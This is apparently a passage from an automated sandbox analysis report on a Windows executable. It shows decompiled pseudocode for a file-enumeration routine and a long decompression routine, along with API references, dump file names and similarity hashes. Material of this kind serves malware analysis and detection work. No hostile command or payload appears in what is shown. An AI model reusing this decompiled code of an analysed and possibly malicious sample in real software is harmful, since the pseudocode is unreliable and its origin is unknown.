						 *(_t90 + 0x1008) = _v596.dwFileAttributes;
						 *((intOrPtr*)(_t90 + 0x1028)) = _v596.ftCreationTime;
						 *((intOrPtr*)(_t90 + 0x102c)) = _v588;
						 *((intOrPtr*)(_t90 + 0x1030)) = _v596.ftLastAccessTime;
						 *((intOrPtr*)(_t90 + 0x1034)) = _v580;
						 *((intOrPtr*)(_t90 + 0x1038)) = _v596.ftLastWriteTime;
						 *((intOrPtr*)(_t90 + 0x103c)) = _v572;
						asm("adc edx, edi");
						 *((intOrPtr*)(_t90 + 0x1004)) = _t87;
						E00410EE3(_t90 + 0x1010,  &(_v596.ftLastWriteTime));
						E00410EE3(_t90 + 0x1018,  &(_v596.ftCreationTime));
						E00410EE3(_t90 + 0x1020,  &(_v596.ftLastAccessTime));
					} else {
						if(E0040A582(_a8,  &_v4692, 0x800) == 0) {
							L4:
							_t76 = GetLastError();
							if(_t76 == 2 || _t76 == 3 || _t76 == 0x12) {
								_t77 = 0;
								__eflags = 0;
							} else {
								_t77 = 1;
							}
							 *((char*)(_t90 + 0x1044)) = _t77;
						} else {
							_t81 = FindFirstFileW( &_v4692,  &_v596); // executed
							_a4 = _t81;
							if(_t81 != 0xffffffff) {
								goto L13;
							} else {
								goto L4;
							}
						}
					}
				}
				 *(_t90 + 0x1040) =  *(_t90 + 0x1040) & 0x00000000;
				return _a4;
			}

0x004091e3
0x004091eb
0x004091f6
0x00409205
0x00409206
0x00409275
0x0040927b
0x0040927d
0x0040927f
0x00409283
0x00409289
0x0040928c
0x0040928c
0x0040928f
0x0040928f
0x00409295
0x00409299
0x00000000
0x00000000
0x00409208
0x00409211
0x00409213
0x00409219
0x0040929f
0x004092a4
0x004092a9
0x004092b2
0x004092d0
0x004092d0
0x004092d2
0x004092de
0x004092ea
0x004092f6
0x00409302
0x0040930e
0x0040931a
0x00409326
0x00409332
0x0040933b
0x00409341
0x00409353
0x00409365
0x0040921f
0x00409231
0x0040924b
0x0040924b
0x00409254
0x00409265
0x00409265
0x00409260
0x00409262
0x00409262
0x00409267
0x00409233
0x00409241
0x00409243
0x00409249
0x00000000
0x00000000
0x00000000
0x00000000
0x00409249
0x00409231
0x00409219
0x0040936a
0x00409378

APIs

FindFirstFileW.KERNELBASE(?,?), ref: 00409211
FindFirstFileW.KERNELBASE(?,?,?,?,00000800), ref: 00409241
GetLastError.KERNEL32(?,?,00000800), ref: 0040924B
FindNextFileW.KERNEL32(000000FF,?), ref: 00409275
GetLastError.KERNEL32 ref: 00409283

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFind$ErrorFirstLast$Next
String ID:
API String ID: 869497890-0
Opcode ID: 1127b6bdc018f742e15cc5d003f8e66121d18b89dc63a61cee265aaaaf662e0e
Instruction ID: b8a9884d36a08adc68181da1517b4939e060516e9248299529b66f5a1db874bf
Opcode Fuzzy Hash: 1127b6bdc018f742e15cc5d003f8e66121d18b89dc63a61cee265aaaaf662e0e
Instruction Fuzzy Hash: A0412F71500644ABCB20DF38CC84ADA77F8BF49354F1049AAF56EE2291D774AE84CF15

Uniqueness

Uniqueness Score: -1.00%

Function 00417894, Relevance: 2.6, APIs: 1, Instructions: 1055
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00417894(void* __ecx, unsigned int _a4, char _a7) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t539;
				signed int _t540;
				unsigned int _t541;
				signed int _t544;
				signed int _t545;
				signed int _t547;
				unsigned int _t551;
				signed int _t553;
				intOrPtr* _t554;
				unsigned int _t556;
				signed int _t559;
				signed int _t560;
				signed int _t561;
				signed int _t562;
				unsigned int _t563;
				signed int _t566;
				signed int _t567;
				signed int _t568;
				signed int _t570;
				unsigned int _t571;
				unsigned int _t580;
				unsigned int _t582;
				signed int _t583;
				unsigned int _t584;
				signed int _t587;
				signed int _t588;
				signed int _t589;
				unsigned int _t590;
				signed int _t592;
				unsigned int _t593;
				unsigned int _t594;
				unsigned int _t595;
				signed int _t597;
				void* _t598;
				void* _t599;
				signed int _t601;
				signed int _t602;
				unsigned int _t603;
				signed int _t606;
				signed int _t607;
				unsigned int _t611;
				signed int _t613;
				unsigned int _t614;
				unsigned int _t616;
				unsigned int _t618;
				signed int _t619;
				unsigned int _t620;
				signed int _t623;
				signed int _t624;
				unsigned int _t625;
				signed int _t626;
				unsigned int _t627;
				signed int _t630;
				signed int _t631;
				signed int _t632;
				unsigned int _t633;
				unsigned int _t634;
				unsigned int _t635;
				signed int _t636;
				signed int _t637;
				signed int _t638;
				unsigned int _t639;
				signed int _t642;
				signed int _t643;
				signed int _t644;
				void* _t648;
				void* _t649;
				signed int _t651;
				unsigned int _t658;
				unsigned int _t660;
				signed char _t661;
				signed int _t662;
				signed int _t666;
				unsigned int _t667;
				unsigned int _t669;
				signed int _t671;
				intOrPtr _t673;
				signed int _t678;
				signed int _t680;
				signed int _t681;
				signed int _t684;
				signed int _t688;
				signed int _t689;
				unsigned int _t695;
				signed int _t696;
				intOrPtr* _t700;
				intOrPtr* _t702;
				signed int _t704;
				signed int _t706;
				unsigned int _t708;
				void* _t710;
				signed int _t715;
				void* _t723;
				unsigned int _t727;
				unsigned int _t730;
				void* _t732;
				signed int _t734;
				char* _t740;
				unsigned int _t741;
				void* _t743;
				intOrPtr* _t747;
				void* _t748;
				signed int _t751;
				signed int _t753;
				unsigned int _t759;
				unsigned int _t762;
				signed int _t766;
				unsigned int _t768;
				void* _t770;
				signed int _t772;
				signed int _t773;
				void* _t779;
				void* _t781;
				signed int _t787;
				void* _t789;
				intOrPtr* _t791;
				void* _t792;
				signed int _t795;
				void* _t798;
				void* _t803;
				signed int _t806;
				void* _t809;
				void* _t814;
				signed int _t817;
				void* _t825;
				signed int _t826;
				intOrPtr _t829;
				unsigned int _t831;
				unsigned int _t832;
				signed int _t834;
				unsigned int _t841;
				void* _t849;
				void* _t854;
				signed int _t855;
				intOrPtr _t858;
				unsigned int _t859;
				signed int _t860;
				signed int _t862;
				intOrPtr _t865;
				signed int _t877;
				intOrPtr _t880;
				signed int _t888;
				signed int _t890;
				intOrPtr _t893;
				signed int _t901;
				signed int _t902;
				signed int _t921;
				signed int _t923;
				intOrPtr _t926;
				intOrPtr* _t934;
				signed int _t935;
				void* _t936;
				void* _t937;
				void* _t938;
				void* _t953;

				_t680 = 0;
				_t936 = __ecx;
				_t938 =  *0x44ebbc - _t680; // 0x1
				if(_t938 != 0) {
					L6:
					 *((char*)(_t936 + 0x4c58)) = 1;
					if( *((char*)(_t936 + 0x4c48)) != 0) {
						L11:
						_t934 = _t936 + 4;
						while(1) {
							L12:
							 *(_t936 + 0x70) =  *(_t936 + 0x70) &  *(_t936 + 0xe6f8);
							if( *_t934 >  *((intOrPtr*)(_t936 + 0x7c)) && E00411E9F(_t683, _t936, _t852) == 0) {
								break;
							}
							_t539 =  *((intOrPtr*)(_t936 + 0x74));
							_t704 =  *(_t936 + 0x70);
							_t852 = _t539 - _t704 &  *(_t936 + 0xe6f8);
							if((_t539 - _t704 &  *(_t936 + 0xe6f8)) >= 0x104 || _t539 == _t704) {
								L20:
								if( *(_t936 + 0xe670) != 1) {
									_t540 = E004094F9(_t934);
									_t681 =  *(_t936 + 0x118);
									_t541 = _t540 & 0x0000fffe;
									__eflags = _t541 -  *((intOrPtr*)(_t936 + 0x98 + _t681 * 4));
									if(_t541 >=  *((intOrPtr*)(_t936 + 0x98 + _t681 * 4))) {
										_t852 = 0xf;
										_t706 = _t681 + 1;
										__eflags = _t706 - _t852;
										if(_t706 >= _t852) {
											L90:
											_t708 =  *(_t934 + 4) + _t852;
											 *(_t934 + 4) = _t708 & 0x00000007;
											_t683 = _t708 >> 3;
											 *_t934 =  *_t934 + (_t708 >> 3);
											_t710 = 0x10;
											_t544 = (_t541 -  *((intOrPtr*)(_t936 + 0x94 + _t852 * 4)) >> _t710 - _t852) +  *((intOrPtr*)(_t936 + 0xd8 + _t852 * 4));
											__eflags = _t544 -  *((intOrPtr*)(_t936 + 0x94));
											if(_t544 >=  *((intOrPtr*)(_t936 + 0x94))) {
												_t544 = 0;
												__eflags = 0;
											}
											_t545 =  *(_t936 + 0xd1c + _t544 * 2) & 0x0000ffff;
											L93:
											__eflags = _t545 - 0x100;
											if(_t545 >= 0x100) {
												__eflags = _t545 - 0x10f;
												if(_t545 < 0x10f) {
													__eflags = _t545 - 0x100;
													if(__eflags != 0) {
														__eflags = _t545 - 0x101;
														if(__eflags != 0) {
															__eflags = _t545 - 0x102;
															if(_t545 != 0x102) {
																__eflags = _t545 - 0x107;
																if(_t545 >= 0x107) {
																	__eflags = _t545 - 0x110;
																	if(_t545 >= 0x110) {
																		continue;
																	}
																	_t547 =  *(_t545 + 0x42f079) & 0x000000ff;
																	_t683 = ( *(_t545 + 0x42f081) & 0x000000ff) + 1;
																	_a4 = _t547;
																	__eflags = _t547;
																	if(_t547 > 0) {
																		_t556 = E004094F9(_t934);
																		_t723 = 0x10;
																		_t683 = _t683 + (_t556 >> _t723 - _a4);
																		_t559 =  *(_t934 + 4) + _a4;
																		 *_t934 =  *_t934 + (_t559 >> 3);
																		_t560 = _t559 & 0x00000007;
																		__eflags = _t560;
																		 *(_t934 + 4) = _t560;
																	}
																	_t715 =  *(_t936 + 0x70);
																	 *(_t936 + 0x60) =  *(_t936 + 0x5c);
																	 *(_t936 + 0x5c) =  *(_t936 + 0x58);
																	 *(_t936 + 0x58) =  *(_t936 + 0x54);
																	_t551 = 2;
																	 *(_t936 + 0x68) = _t551;
																	_a4 = _t551;
																	_t553 = _t715 - _t683;
																	_t854 =  *((intOrPtr*)(_t936 + 0xe6f4)) + 0xffffefff;
																	 *(_t936 + 0x54) = _t683;
																	__eflags = _t553 - _t854;
																	if(_t553 >= _t854) {
																		L218:
																		_t855 =  *(_t936 + 0xe6f8);
																		do {
																			_t683 =  *(_t936 + 0x70);
																			_a4 = _a4 - 1;
																			 *( *((intOrPtr*)(_t936 + 0x4b34)) +  *(_t936 + 0x70)) =  *((intOrPtr*)((_t855 & _t553) +  *((intOrPtr*)(_t936 + 0x4b34))));
																			_t855 =  *(_t936 + 0xe6f8);
																			_t553 = _t553 + 1;
																			__eflags = _a4;
																			 *(_t936 + 0x70) =  *(_t936 + 0x70) + 0x00000001 & _t855;
																		} while (_a4 > 0);
																	} else {
																		__eflags = _t715 - _t854;
																		if(_t715 >= _t854) {
																			goto L218;
																		}
																		_t858 =  *((intOrPtr*)(_t936 + 0x4b34));
																		_t554 = _t553 + _t858;
																		_t852 = _t858 + _t715;
																		 *(_t936 + 0x70) = _t715 + 2;
																		 *_t852 =  *_t554;
																		 *(_t852 + 1) =  *((intOrPtr*)(_t554 + 1));
																	}
																	continue;
																}
																_t561 = _t545 + 0xfffffefd;
																_t727 = _t936 + 0x54 + _t561 * 4;
																_t859 =  *_t727;
																_v12 = _t859;
																while(1) {
																	__eflags = _t561;
																	if(_t561 <= 0) {
																		break;
																	}
																	 *_t727 =  *(_t727 - 4);
																	_t561 = _t561 - 1;
																	_t727 = _t727 - 4;
																	__eflags = _t727;
																}
																 *(_t936 + 0x54) = _t859;
																_t562 = E004094F9(_t934);
																_t688 =  *(_t936 + 0x2ddc);
																_t563 = _t562 & 0x0000fffe;
																__eflags = _t563 -  *((intOrPtr*)(_t936 + 0x2d5c + _t688 * 4));
																if(_t563 >=  *((intOrPtr*)(_t936 + 0x2d5c + _t688 * 4))) {
																	_t860 = 0xf;
																	_t689 = _t688 + 1;
																	__eflags = _t689 - _t860;
																	if(_t689 >= _t860) {
																		L185:
																		_t730 =  *(_t934 + 4) + _t860;
																		 *(_t934 + 4) = _t730 & 0x00000007;
																		 *_t934 =  *_t934 + (_t730 >> 3);
																		_t732 = 0x10;
																		_t566 = (_t563 -  *((intOrPtr*)(_t936 + 0x2d58 + _t860 * 4)) >> _t732 - _t860) +  *((intOrPtr*)(_t936 + 0x2d9c + _t860 * 4));
																		__eflags = _t566 -  *((intOrPtr*)(_t936 + 0x2d58));
																		if(_t566 >=  *((intOrPtr*)(_t936 + 0x2d58))) {
																			_t566 = 0;
																			__eflags = 0;
																		}
																		_t567 =  *(_t936 + 0x39e0 + _t566 * 2) & 0x0000ffff;
																		L188:
																		_t568 =  *(_t567 + 0x42f190) & 0x000000ff;
																		_t683 = ( *(_t567 + 0x42f1ac) & 0x000000ff) + 2;
																		_v16 = _t683;
																		_a4 = _t568;
																		__eflags = _t568;
																		if(_t568 > 0) {
																			_t584 = E004094F9(_t934);
																			_t743 = 0x10;
																			_t683 = _t683 + (_t584 >> _t743 - _a4);
																			_t587 =  *(_t934 + 4) + _a4;
																			_v16 = _t683;
																			 *_t934 =  *_t934 + (_t587 >> 3);
																			_t588 = _t587 & 0x00000007;
																			__eflags = _t588;
																			 *(_t934 + 4) = _t588;
																		}
																		_t734 =  *(_t936 + 0x70);
																		_t570 = _t734 - _v12;
																		_t852 =  *((intOrPtr*)(_t936 + 0xe6f4)) + 0xffffefff;
																		 *(_t936 + 0x68) = _t683;
																		_a4 = _t683;
																		__eflags = _t570 - _t852;
																		if(_t570 >= _t852) {
																			L208:
																			__eflags = _t683;
																			if(_t683 <= 0) {
																				continue;
																			}
																			_t862 =  *(_t936 + 0xe6f8);
																			do {
																				_t683 =  *(_t936 + 0x70);
																				_a4 = _a4 - 1;
																				 *( *((intOrPtr*)(_t936 + 0x4b34)) +  *(_t936 + 0x70)) =  *((intOrPtr*)((_t862 & _t570) +  *((intOrPtr*)(_t936 + 0x4b34))));
																				_t862 =  *(_t936 + 0xe6f8);
																				_t570 = _t570 + 1;
																				__eflags = _a4;
																				 *(_t936 + 0x70) =  *(_t936 + 0x70) + 0x00000001 & _t862;
																			} while (_a4 > 0);
																			continue;
																		} else {
																			__eflags = _t734 - _t852;
																			if(_t734 >= _t852) {
																				goto L208;
																			}
																			_t865 =  *((intOrPtr*)(_t936 + 0x4b34));
																			_t683 = _t865 + _t570;
																			_t571 = _v16;
																			_t852 = _t865 + _t734;
																			_v8 = _t852;
																			 *(_t936 + 0x70) = _t734 + _t571;
																			__eflags = _v12 - _t571;
																			if(_v12 >= _t571) {
																				__eflags = _t571 - 8;
																				if(_t571 < 8) {
																					L200:
																					__eflags = _a4;
																					if(_a4 > 0) {
																						__eflags = _a4 - 1;
																						_t740 = _v8;
																						 *_t740 =  *_t683;
																						if(_a4 > 1) {
																							__eflags = _a4 - 2;
																							 *((char*)(_t740 + 1)) =  *((intOrPtr*)(_t683 + 1));
																							if(_a4 > 2) {
																								__eflags = _a4 - 3;
																								 *((char*)(_t740 + 2)) =  *((intOrPtr*)(_t683 + 2));
																								if(_a4 > 3) {
																									__eflags = _a4 - 4;
																									 *((char*)(_t740 + 3)) =  *((intOrPtr*)(_t683 + 3));
																									if(_a4 > 4) {
																										__eflags = _a4 - 5;
																										 *((char*)(_t740 + 4)) =  *((intOrPtr*)(_t683 + 4));
																										if(_a4 > 5) {
																											__eflags = _a4 - 6;
																											 *((char*)(_t740 + 5)) =  *((intOrPtr*)(_t683 + 5));
																											if(_a4 > 6) {
																												 *((char*)(_t740 + 6)) =  *((intOrPtr*)(_t683 + 6));
																											}
																										}
																									}
																								}
																							}
																						}
																					}
																					continue;
																				}
																				_t580 = _v16 >> 3;
																				__eflags = _t580;
																				_v16 = _t580;
																				do {
																					E0041BB80(_t683, _t934, _t936, _v8, _t683, 8);
																					_v8 = _v8 + 8;
																					_a4 = _a4 - 8;
																					_t937 = _t937 + 0xc;
																					_t683 = _t683 + 8;
																					_t467 =  &_v16;
																					 *_t467 = _v16 - 1;
																					__eflags =  *_t467;
																				} while ( *_t467 != 0);
																				goto L200;
																			}
																			__eflags = _t571 - 8;
																			if(_t571 < 8) {
																				goto L200;
																			}
																			_t582 = _t571 >> 3;
																			__eflags = _t582;
																			_t741 = _t582;
																			_t583 = _t852;
																			do {
																				_a4 = _a4 - 8;
																				 *_t583 =  *_t683;
																				 *((char*)(_t583 + 1)) =  *((intOrPtr*)(_t683 + 1));
																				 *((char*)(_t583 + 2)) =  *((intOrPtr*)(_t683 + 2));
																				 *((char*)(_t583 + 3)) =  *((intOrPtr*)(_t683 + 3));
																				 *((char*)(_t583 + 4)) =  *((intOrPtr*)(_t683 + 4));
																				 *((char*)(_t583 + 5)) =  *((intOrPtr*)(_t683 + 5));
																				 *((char*)(_t583 + 6)) =  *((intOrPtr*)(_t683 + 6));
																				_t852 =  *((intOrPtr*)(_t683 + 7));
																				 *((char*)(_t583 + 7)) =  *((intOrPtr*)(_t683 + 7));
																				_t683 = _t683 + 8;
																				_t583 = _t583 + 8;
																				_t741 = _t741 - 1;
																				__eflags = _t741;
																			} while (_t741 != 0);
																			_v8 = _t583;
																			goto L200;
																		}
																	}
																	_t747 = _t936 + 0x2d5c + _t689 * 4;
																	while(1) {
																		__eflags = _t563 -  *_t747;
																		if(_t563 <  *_t747) {
																			break;
																		}
																		_t689 = _t689 + 1;
																		_t747 = _t747 + 4;
																		__eflags = _t689 - 0xf;
																		if(_t689 < 0xf) {
																			continue;
																		}
																		goto L185;
																	}
																	_t860 = _t689;
																	goto L185;
																}
																_t748 = 0x10;
																_t589 = _t563 >> _t748 - _t688;
																_t751 = ( *(_t589 + _t936 + 0x2de0) & 0x000000ff) +  *(_t934 + 4);
																 *_t934 =  *_t934 + (_t751 >> 3);
																 *(_t934 + 4) = _t751 & 0x00000007;
																_t567 =  *(_t936 + 0x31e0 + _t589 * 2) & 0x0000ffff;
																goto L188;
															}
															_t590 =  *(_t936 + 0x68);
															__eflags = _t590;
															if(_t590 == 0) {
																continue;
															}
															_t753 =  *(_t936 + 0x70);
															_a4 = _t590;
															_t592 = _t753 -  *(_t936 + 0x54);
															_t852 =  *((intOrPtr*)(_t936 + 0xe6f4)) + 0xffffefff;
															__eflags = _t592 - _t852;
															if(_t592 >= _t852) {
																L169:
																__eflags = _a4;
																if(_a4 <= 0) {
																	continue;
																}
																_t877 =  *(_t936 + 0xe6f8);
																do {
																	_t683 =  *(_t936 + 0x70);
																	_a4 = _a4 - 1;
																	 *( *((intOrPtr*)(_t936 + 0x4b34)) +  *(_t936 + 0x70)) =  *((intOrPtr*)((_t877 & _t592) +  *((intOrPtr*)(_t936 + 0x4b34))));
																	_t877 =  *(_t936 + 0xe6f8);
																	_t592 = _t592 + 1;
																	__eflags = _a4;
																	 *(_t936 + 0x70) =  *(_t936 + 0x70) + 0x00000001 & _t877;
																} while (_a4 > 0);
																continue;
															}
															__eflags = _t753 - _t852;
															if(_t753 >= _t852) {
																goto L169;
															}
															_t880 =  *((intOrPtr*)(_t936 + 0x4b34));
															_t683 = _t880 + _t592;
															_t593 = _a4;
															_t852 = _t880 + _t753;
															_v12 = _t852;
															 *(_t936 + 0x70) = _t753 + _t593;
															__eflags =  *(_t936 + 0x54) - _t593;
															if( *(_t936 + 0x54) >= _t593) {
																__eflags = _t593 - 8;
																if(_t593 < 8) {
																	L146:
																	_t759 = _a4;
																	__eflags = _t759;
																	if(_t759 <= 0) {
																		continue;
																	}
																	_t594 = _v12;
																	L53:
																	_t852 =  *_t683;
																	 *_t594 =  *_t683;
																	__eflags = _t759 - 1;
																	if(_t759 > 1) {
																		_t852 =  *((intOrPtr*)(_t683 + 1));
																		 *((char*)(_t594 + 1)) =  *((intOrPtr*)(_t683 + 1));
																		__eflags = _t759 - 2;
																		if(_t759 > 2) {
																			_t852 =  *((intOrPtr*)(_t683 + 2));
																			 *((char*)(_t594 + 2)) =  *((intOrPtr*)(_t683 + 2));
																			__eflags = _t759 - 3;
																			if(_t759 > 3) {
																				_t852 =  *((intOrPtr*)(_t683 + 3));
																				 *((char*)(_t594 + 3)) =  *((intOrPtr*)(_t683 + 3));
																				__eflags = _t759 - 4;
																				if(_t759 > 4) {
																					_t852 =  *((intOrPtr*)(_t683 + 4));
																					 *((char*)(_t594 + 4)) =  *((intOrPtr*)(_t683 + 4));
																					__eflags = _t759 - 5;
																					if(_t759 > 5) {
																						_t852 =  *((intOrPtr*)(_t683 + 5));
																						 *((char*)(_t594 + 5)) =  *((intOrPtr*)(_t683 + 5));
																						__eflags = _t759 - 6;
																						if(_t759 > 6) {
																							 *((char*)(_t594 + 6)) =  *((intOrPtr*)(_t683 + 6));
																						}
																					}
																				}
																			}
																		}
																	}
																	continue;
																}
																_t595 = _t593 >> 3;
																__eflags = _t595;
																_v16 = _t595;
																do {
																	E0041BB80(_t683, _t934, _t936, _v12, _t683, 8);
																	_v12 = _v12 + 8;
																	_a4 = _a4 - 8;
																	_t937 = _t937 + 0xc;
																	_t683 = _t683 + 8;
																	_t377 =  &_v16;
																	 *_t377 = _v16 - 1;
																	__eflags =  *_t377;
																} while ( *_t377 != 0);
																goto L146;
															}
															__eflags = _t593 - 8;
															if(_t593 < 8) {
																goto L146;
															}
															_t762 = _t593 >> 3;
															__eflags = _t762;
															_t597 = _t852;
															do {
																_a4 = _a4 - 8;
																 *_t597 =  *_t683;
																 *((char*)(_t597 + 1)) =  *((intOrPtr*)(_t683 + 1));
																 *((char*)(_t597 + 2)) =  *((intOrPtr*)(_t683 + 2));
																 *((char*)(_t597 + 3)) =  *((intOrPtr*)(_t683 + 3));
																 *((char*)(_t597 + 4)) =  *((intOrPtr*)(_t683 + 4));
																 *((char*)(_t597 + 5)) =  *((intOrPtr*)(_t683 + 5));
																 *((char*)(_t597 + 6)) =  *((intOrPtr*)(_t683 + 6));
																_t852 =  *((intOrPtr*)(_t683 + 7));
																 *((char*)(_t597 + 7)) =  *((intOrPtr*)(_t683 + 7));
																_t683 = _t683 + 8;
																_t597 = _t597 + 8;
																_t762 = _t762 - 1;
																__eflags = _t762;
															} while (_t762 != 0);
															L142:
															_v12 = _t597;
															goto L146;
														}
														_t598 = E004176B3(_t936, _t852, __eflags); // executed
														L25:
														if(_t598 != 0) {
															continue;
														} else {
															break;
														}
													}
													_t598 = E00414A4B(_t936, __eflags);
													goto L25;
												}
												_t601 =  *(_t545 + 0x42f081) & 0x000000ff;
												_t695 = ( *(_t545 + 0x42f09d) & 0x000000ff) + 3;
												_v8 = _t695;
												_a4 = _t601;
												__eflags = _t601;
												if(_t601 > 0) {
													_t639 = E004094F9(_t934);
													_t809 = 0x10;
													_t642 =  *(_t934 + 4) + _a4;
													_v8 = _t695 + (_t639 >> _t809 - _a4);
													 *_t934 =  *_t934 + (_t642 >> 3);
													_t643 = _t642 & 0x00000007;
													__eflags = _t643;
													 *(_t934 + 4) = _t643;
												}
												_t602 = E004094F9(_t934);
												_t696 =  *(_t936 + 0x1004);
												_t603 = _t602 & 0x0000fffe;
												__eflags = _t603 -  *((intOrPtr*)(_t936 + 0xf84 + _t696 * 4));
												if(_t603 >=  *((intOrPtr*)(_t936 + 0xf84 + _t696 * 4))) {
													_t888 = 0xf;
													_t766 = _t696 + 1;
													__eflags = _t766 - _t888;
													if(_t766 >= _t888) {
														L107:
														_t768 =  *(_t934 + 4) + _t888;
														 *(_t934 + 4) = _t768 & 0x00000007;
														 *_t934 =  *_t934 + (_t768 >> 3);
														_t770 = 0x10;
														_t606 = (_t603 -  *((intOrPtr*)(_t936 + 0xf80 + _t888 * 4)) >> _t770 - _t888) +  *((intOrPtr*)(_t936 + 0xfc4 + _t888 * 4));
														__eflags = _t606 -  *((intOrPtr*)(_t936 + 0xf80));
														if(_t606 >=  *((intOrPtr*)(_t936 + 0xf80))) {
															_t606 = 0;
															__eflags = 0;
														}
														_t607 =  *(_t936 + 0x1c08 + _t606 * 2) & 0x0000ffff;
														goto L110;
													}
													_t700 = _t936 + 0xf84 + _t766 * 4;
													while(1) {
														__eflags = _t603 -  *_t700;
														if(_t603 <  *_t700) {
															break;
														}
														_t766 = _t766 + 1;
														_t700 = _t700 + 4;
														__eflags = _t766 - 0xf;
														if(_t766 < 0xf) {
															continue;
														}
														goto L107;
													}
													_t888 = _t766;
													goto L107;
												} else {
													_t803 = 0x10;
													_t638 = _t603 >> _t803 - _t696;
													_t806 = ( *(_t638 + _t936 + 0x1008) & 0x000000ff) +  *(_t934 + 4);
													 *_t934 =  *_t934 + (_t806 >> 3);
													 *(_t934 + 4) = _t806 & 0x00000007;
													_t607 =  *(_t936 + 0x1408 + _t638 * 2) & 0x0000ffff;
													L110:
													_t772 =  *(_t607 + 0x44eb78) & 0x000000ff;
													_t683 =  *((intOrPtr*)(0x44ebb8 + _t607 * 4)) + 1;
													_v16 = _t683;
													_a4 = _t772;
													__eflags = _t772;
													if(_t772 <= 0) {
														L133:
														__eflags = _t683 - 0x2000;
														if(_t683 >= 0x2000) {
															_v8 = _v8 + 1;
															__eflags = _t683 - 0x40000;
															if(_t683 >= 0x40000) {
																_t281 =  &_v8;
																 *_t281 = _v8 + 1;
																__eflags =  *_t281;
															}
														}
														_t773 =  *(_t936 + 0x70);
														 *(_t936 + 0x60) =  *(_t936 + 0x5c);
														 *(_t936 + 0x5c) =  *(_t936 + 0x58);
														 *(_t936 + 0x58) =  *(_t936 + 0x54);
														_t611 = _v8;
														 *(_t936 + 0x68) = _t611;
														_a4 = _t611;
														_t613 = _t773 - _t683;
														_t852 =  *((intOrPtr*)(_t936 + 0xe6f4)) + 0xffffefff;
														 *(_t936 + 0x54) = _t683;
														__eflags = _t613 - _t852;
														if(_t613 >= _t852) {
															L148:
															__eflags = _v8;
															if(_v8 <= 0) {
																continue;
															}
															_t890 =  *(_t936 + 0xe6f8);
															do {
																_t683 =  *(_t936 + 0x70);
																_a4 = _a4 - 1;
																 *( *((intOrPtr*)(_t936 + 0x4b34)) +  *(_t936 + 0x70)) =  *((intOrPtr*)((_t890 & _t613) +  *((intOrPtr*)(_t936 + 0x4b34))));
																_t890 =  *(_t936 + 0xe6f8);
																_t613 = _t613 + 1;
																__eflags = _a4;
																 *(_t936 + 0x70) =  *(_t936 + 0x70) + 0x00000001 & _t890;
															} while (_a4 > 0);
															continue;
														} else {
															__eflags = _t773 - _t852;
															if(_t773 >= _t852) {
																goto L148;
															}
															_t893 =  *((intOrPtr*)(_t936 + 0x4b34));
															_t683 = _t893 + _t613;
															_t614 = _v8;
															_t852 = _t893 + _t773;
															_v12 = _t852;
															 *(_t936 + 0x70) = _t773 + _t614;
															__eflags = _v16 - _t614;
															if(_v16 >= _t614) {
																__eflags = _t614 - 8;
																if(_t614 < 8) {
																	goto L146;
																}
																_t616 = _v8 >> 3;
																__eflags = _t616;
																_v16 = _t616;
																do {
																	E0041BB80(_t683, _t934, _t936, _v12, _t683, 8);
																	_v12 = _v12 + 8;
																	_a4 = _a4 - 8;
																	_t937 = _t937 + 0xc;
																	_t683 = _t683 + 8;
																	_t328 =  &_v16;
																	 *_t328 = _v16 - 1;
																	__eflags =  *_t328;
																} while ( *_t328 != 0);
																goto L146;
															}
															_t779 = 8;
															__eflags = _t614 - _t779;
															if(_t614 < _t779) {
																goto L146;
															}
															_t618 = _t614 >> 3;
															__eflags = _t618;
															_v16 = _t618;
															_t619 = _t852;
															do {
																_a4 = _a4 - _t779;
																 *_t619 =  *_t683;
																 *((char*)(_t619 + 1)) =  *((intOrPtr*)(_t683 + 1));
																 *((char*)(_t619 + 2)) =  *((intOrPtr*)(_t683 + 2));
																 *((char*)(_t619 + 3)) =  *((intOrPtr*)(_t683 + 3));
																 *((char*)(_t619 + 4)) =  *((intOrPtr*)(_t683 + 4));
																 *((char*)(_t619 + 5)) =  *((intOrPtr*)(_t683 + 5));
																 *((char*)(_t619 + 6)) =  *((intOrPtr*)(_t683 + 6));
																_t852 =  *((intOrPtr*)(_t683 + 7));
																 *((char*)(_t619 + 7)) =  *((intOrPtr*)(_t683 + 7));
																_t683 = _t683 + _t779;
																_t619 = _t619 + _t779;
																_t318 =  &_v16;
																 *_t318 = _v16 - 1;
																__eflags =  *_t318;
															} while ( *_t318 != 0);
															goto L142;
														}
													}
													__eflags = _t607 - 9;
													if(_t607 <= 9) {
														_t620 = E004094F9(_t934);
														_t781 = 0x10;
														_t683 = _t683 + (_t620 >> _t781 - _a4);
														_t623 =  *(_t934 + 4) + _a4;
														 *_t934 =  *_t934 + (_t623 >> 3);
														_t624 = _t623 & 0x00000007;
														__eflags = _t624;
														 *(_t934 + 4) = _t624;
														L132:
														_v16 = _t683;
														goto L133;
													}
													__eflags = _t772 - 4;
													if(_t772 > 4) {
														_t634 = E004094F9(_t934);
														_t635 = _a4;
														_t798 = 0x14;
														_t636 =  *(_t934 + 4) + _t635 - 4;
														 *_t934 =  *_t934 + (_t636 >> 3);
														_t683 = _t683 + (_t634 >> _t798 - _t635 << 4);
														_t637 = _t636 & 0x00000007;
														__eflags = _t637;
														 *(_t934 + 4) = _t637;
													}
													_t625 =  *(_t936 + 0x98cc);
													__eflags = _t625;
													if(_t625 <= 0) {
														_t626 = E004094F9(_t934);
														_t901 =  *(_t936 + 0x1ef0);
														_t627 = _t626 & 0x0000fffe;
														__eflags = _t627 -  *((intOrPtr*)(_t936 + 0x1e70 + _t901 * 4));
														if(_t627 >=  *((intOrPtr*)(_t936 + 0x1e70 + _t901 * 4))) {
															_t902 = _t901 + 1;
															_a4 = 0xf;
															__eflags = _t902 - 0xf;
															if(_t902 >= 0xf) {
																L125:
																_t787 =  *(_t934 + 4) + _a4;
